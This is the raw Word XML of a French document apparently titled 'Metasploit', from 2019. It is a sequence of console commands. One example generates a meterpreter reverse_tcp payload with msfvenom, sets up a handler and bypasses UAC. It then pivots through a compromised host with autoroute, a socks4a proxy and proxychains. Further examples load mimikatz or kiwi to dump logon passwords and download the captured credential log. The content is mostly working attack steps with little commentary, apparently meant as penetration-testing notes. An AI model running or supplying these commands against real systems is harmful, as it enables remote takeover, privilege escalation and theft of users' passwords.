    <w:p w14:paraId="06703C76" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRPr="00B87751" w:rsidRDefault="00EE5E88" w:rsidP="00EE5E88">
      <w:r w:rsidRPr="00B87751">
        <w:t>Exemple 3 – Création d’un pivot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC1E16" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --platform Windows --arch x64 --format exe --out payload-6_1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AAF3B5" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="705425B1" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6736E751" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4054FD8B" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88" w:rsidRDefault="00744FB5" w:rsidP="00744FB5">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FA5A6" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88" w:rsidRDefault="00744FB5" w:rsidP="00744FB5">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD29736" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88" w:rsidRDefault="00744FB5" w:rsidP="00744FB5">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FFDE84" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRDefault="00744FB5" w:rsidP="00744FB5">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-- Execute payload on remote host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34083702" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00EE5E88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EE5E88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A332563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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/windows/local/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bypassuac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="572E22C0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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FF80D26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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1D25C7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# </w:t>
      </w:r>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3EF4E6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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5945D878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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="678E6748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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D1D2061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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4170004E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ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C88CBA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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CB6DA0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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39537E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run autoroute -s 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7544C8DF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autoroute -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADB0F21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info auxiliary/server/socks4a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E04DCF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use auxiliary/server/socks4a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681602E5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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F79FF68" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRPr="00744FB5" w:rsidRDefault="00744FB5" w:rsidP="00744FB5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744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo 'proxy_dns</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\ntcp_read_time_out\ntcp_connect_time_out\n[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProxyList]\nsocks4 127.0.0.1 1080' &gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00744FB5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>proxychains.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7648080D" w14:textId="77777777" w:rsidR="00744FB5" w:rsidRDefault="00744FB5" w:rsidP="00744FB5">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt;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etln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1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469E1AB" w14:textId="77777777" w:rsidR="00EE5E88" w:rsidRDefault="00744FB5" w:rsidP="00744FB5">
      <w:pPr>
        <w:pStyle w:val="Consolelastline"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proxychains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https://192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D033C35" w14:textId="07444B24" w:rsidR="00744FB5" w:rsidRDefault="00B87751" w:rsidP="00744FB5">
      <w:r>
        <w:t xml:space="preserve">Exemple 4 – Récupération de mots de passe avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B948F2">
        <w:t xml:space="preserve"> (Windows 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4E9CF" w14:textId="684ECACC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getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21BA8A7C" w14:textId="34E2DD6A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sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C5F7A43" w14:textId="1B7F1E41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B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">load </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="620368EF" w14:textId="188A63B0" w:rsidR="00B948F2" w:rsidRPr="00B948F2" w:rsidRDefault="00B948F2" w:rsidP="00B948F2">
      <w:pPr>
        <w:pStyle w:val="Consolelast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mimikatz_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sekurlsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>logonPasswords</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E627129" w14:textId="101F0506" w:rsidR="00B87751" w:rsidRDefault="00B948F2" w:rsidP="00744FB5">
      <w:r>
        <w:t xml:space="preserve">Exemple </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Récupération de mots de passe avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Windows </w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC025DF" w14:textId="55BB7AC2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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C79B3D5" w14:textId="4AC8D60F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getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="33F4A15C" w14:textId="190897C0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getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ADF1BFD" w14:textId="3FB5A692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r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>load kiwi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C41A362" w14:textId="7F37DF27" w:rsidR="00B948F2" w:rsidRPr="00B948F2" w:rsidRDefault="00B948F2" w:rsidP="00B948F2">
      <w:pPr>
        <w:pStyle w:val="Consoleinline"/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B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kiwi_cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memssp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11105F7F" w14:textId="5B63215D" w:rsidR="00B948F2" w:rsidRPr="00B948F2" w:rsidRDefault="00B948F2" w:rsidP="00B948F2">
      <w:pPr>
        <w:pStyle w:val="Consolelastline"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00B948F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>download C:\\Windows\\System32\\mimilsa.log /root/Desktop/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B948F2" w:rsidRPr="00B948F2" w:rsidSect="00FB03C3">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9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603C" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E" w:rsidP="00C6380C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A4B671" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E" w:rsidP="00C6380C"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="08F2749C" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E" w:rsidP="00C6380C">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870320A" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E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69AB7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583A2F07" w14:textId="77777777" w:rsidR="00280B2D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5C08" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E" w:rsidP="00C6380C">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26445395" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E" w:rsidP="00C6380C"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17D03413" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E" w:rsidP="00C6380C">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A6AC3" w14:textId="77777777" w:rsidR="006A409E" w:rsidRDefault="006A409E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B29F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35EF8C0F" wp14:editId="41DCF5E3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54D1E885" wp14:editId="13D2151B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BC550F" w14:textId="77777777" w:rsidR="00C6380C" w:rsidRPr="00C6380C" w:rsidRDefault="00EE5E88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Metasploit</w:t>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="3C17C504" w14:textId="77777777" w:rsidR="00280B2D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19-07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E5E88">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
          </w:rPr>
          <w:t>27/07/2019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5E88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5.5pt;height:190.5pt" o:bullet="t">
        <v:imagedata r:id="rId1" o:title="01_metasploit_icon-300x300"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1D114B1A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C865F5C"/>
    <w:lvl w:ilvl="0" w:tplc="B02AF2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35F8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="641AD6DE"/>
    <w:lvl w:ilvl="0" w:tplc="B02AF2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88"/>
    <w:rsid w:val="00023A77"/>
    <w:rsid w:val="00280B2D"/>
    <w:rsid w:val="002B1B07"/>
    <w:rsid w:val="004A58E5"/>
    <w:rsid w:val="004F337B"/>
    <w:rsid w:val="005B7BA6"/>
    <w:rsid w:val="006A409E"/>
    <w:rsid w:val="00744FB5"/>
    <w:rsid w:val="007B6C60"/>
    <w:rsid w:val="00982295"/>
    <w:rsid w:val="00B87751"/>
    <w:rsid w:val="00B948F2"/>
    <w:rsid w:val="00BC7476"/>
    <w:rsid w:val="00C6377E"/>
    <w:rsid w:val="00C6380C"/>
    <w:rsid w:val="00CC409D"/>
    <w:rsid w:val="00D44144"/>
    <w:rsid w:val="00EE5E88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01110"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{55ADA3DD-81C6-4723-A169-007103C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EE5E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EE5E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EE5E88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paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00EE5E88"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ConsolelastlineCar">
    <w:name w:val="Console last line Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Consolelastline"/>
    <w:rsid w:val="00EE5E88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styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00744F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%20persos\Documents\Mod&#232;les%20de%20documents\Templates%20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21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Metasploit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</dc:title>
  <dc:subject/>
  <dc:creator>Jimmy Poirier</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jimmy</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-27T09:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-27T10:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>